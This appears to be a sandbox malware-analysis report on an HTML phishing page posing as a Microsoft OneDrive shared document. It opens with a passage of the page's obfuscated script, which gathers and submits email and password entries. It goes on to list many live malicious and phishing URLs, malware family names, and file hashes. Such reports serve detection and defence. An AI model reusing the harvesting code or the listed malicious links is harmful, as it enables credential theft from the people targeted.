_0x52979e=_0x21469b;$(_0x52979e(0x1c5))[_0x52979e(0x1c9)](''),$('#error')[_0x52979e(0x1ae)](),$(_0x52979e(0x1c1))[_0x52979e(0x1b2)](_0x52979e(0x1c4));},'complete':function(){var _0x5981d5=_0x21469b;$(_0x5981d5(0x1ac))['val'](_0x5981d5(0x1a9));}});});function _0x312a24(_0x476e6b){var _0x51a69f=_0x5d98f5,_0x56008d=/^[^\s@]+@[^\s@]+\.[^\s@]+$/;return _0x56008d[_0x51a69f(0x1c0)](_0x476e6b);}}));function _0x5796(){var _0x542ed0=['#idSIButton9','4783446pGxKlc','show','log','ajax','112241UjlLVP','html','Email\x20field\x20is\x20empty.','#msg','Sign\x20in','signal','#submit-btn','Password\x20field\x20is\x20empty.','attr','145085WhTlRU','#amg-e','437520euTBCA','readonly','306889YHeHtn','JSON','test','#error','56oKaoDY','4xazCUu','An\x20error\x20occurred.\x20Please\x20try\x20again\x20later.','#amg-p','hide','63CTsZlm','click','val','1589157lbGOuU','374292kgokDe','Continue','30OBCFLo','Invalid\x20email\x20format.\x20Please\x20enter\x20a\x20valid\x20email\x20address.'];_0x5796=function(){return _0x542ed0;};return _0x5796();}
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://
URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To read the document, Only recipient email below can access shared files.", "prominent_button_name": "Continue", "text_input_field_labels": [ "ama@coredc.com" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To read the document, Only recipient email below can access shared files.", "prominent_button_name": "Continue", "text_input_field_labels": [ "ama@coredc.com" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=17 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To read the document, Only recipient email below can access shared files.", "prominent_button_name": "Continue", "text_input_field_labels": [ "ama@coredc.com" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=17 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To read the document, Only recipient email below can access shared files.", "prominent_button_name": "Continue", "text_input_field_labels": [ "ama@coredc.com" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=17 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=17 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.2.137	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.dk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://soporte-store.info/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://applela.za.com/isignesp.php?id=	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.9.1.js
	http://awqffg.newburuan2023.biz.id/next.php	Get hash	malicious	HTMLPhisher	Browse	code.jquery.com/jquery-1.10.2.min.js
239.255.255.250	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	https://rebrand.ly/3d446f	Get hash	malicious	HTMLPhisher	Browse
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse
	https://pharteewhi.xyz/	Get hash	malicious	Unknown	Browse
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse
	HtTP://6t.NZ:8080/y6yI7arXqwIyN8RPzQgp/WFeSsM/5CG043B2PX?JEV004%20NSXCajsE=jI	Get hash	malicious	Unknown	Browse
	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
151.101.130.137	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://imaps-support.us/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29t	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://site9613885.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Vernales Restaurant-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	ZipThis.exe	Get hash	malicious	Unknown	Browse	151.101.130.137
s-part-0033.t-0009.t-msedge.net	https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
	1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exe	Get hash	malicious	LiteHTTP Bot	Browse	13.107.246.61
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	13.107.246.61
	LEmJJ87mUQ.exe	Get hash	malicious	Lokibot	Browse	13.107.246.61
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
	http://nxejt.polluxcastor.top	Get hash	malicious	Unknown	Browse	13.107.246.61
	https://mzvdazkxhcgohr.azureedge.net/7766j/?fbclid=IwY2xjawEYc-5leHRuA2FlbQEwAAEdG07X18DGPEURgpfyaSZY6plE3zyyIkcG5kokds9mnvD6i-BtmiU_lzIp_aem_ff88HnOUTFQFLZ993tisVw#	Get hash	malicious	Unknown	Browse	13.107.246.61
	https://www.imca-int.com/safety-events/loss-of-pressure-to-divers-primary-air-supply/#msdynttrid=gm4lm4Er39QjZQgkKZVlOHSa50W_Z4pWVjSg4GGAJjQ	Get hash	malicious	Unknown	Browse	13.107.246.61
	https://4smgswwi.r.us-west-2.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9917688bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541primmacy.com%252Fwinner%252F77663%252F%252FYmVja3kuYmFyY2tsZXlAY2xlYXJ3YXRlcnBhcGVyLmNvbQ==/1/0101019079f53360-ad062f3a-6c08-4c14-8569-269fb9f20297-000000/mkI5299-kBX9yyfDwVrQlybi5Wk=382	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
	umcu.org.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.61
s-part-0017.t-0009.t-msedge.net	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	1.exe	Get hash	malicious	LummaC, XRed	Browse	13.107.246.45
	64pOGv7k4N.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	13.107.246.45
	mail-41.eml	Get hash	malicious	Unknown	Browse	13.107.246.45
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	13.107.246.45
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	13.107.246.45
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	64.exe	Get hash	malicious	Unknown	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	151.101.194.137
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	199.232.214.172
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	151.101.193.229
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==	Get hash	malicious	Unknown	Browse	151.101.194.137
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	199.232.192.193
FASTLYUS	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	151.101.194.137
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	199.232.214.172
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	151.101.193.229
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==	Get hash	malicious	Unknown	Browse	151.101.194.137
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	199.232.192.193
ONEANDONE-ASBrauerstrasse48DE	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	217.160.0.160
	https://www.boulderpeptide.org/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	74.208.236.22
	https://nutricarm.es/wp-templates/f8b83.php	Get hash	malicious	Unknown	Browse	212.227.149.251
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	104.192.6.92
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	213.165.79.98
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	94.143.136.202
	nshsh4.elf	Get hash	malicious	Mirai	Browse	217.72.194.9
	https://www.tblgroup.com/tbl2/certificados-digitales/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	77.68.64.11
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	70.35.199.65
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	77.68.106.22

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://logincdn.msauth.net/16.000.28510.6/images/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	dropped
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
Reputation:	high, very likely benign file
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (64445), with CRLF line terminators
Category:	dropped
Size (bytes):	276886
Entropy (8bit):	5.790551596591208
Encrypted:	false
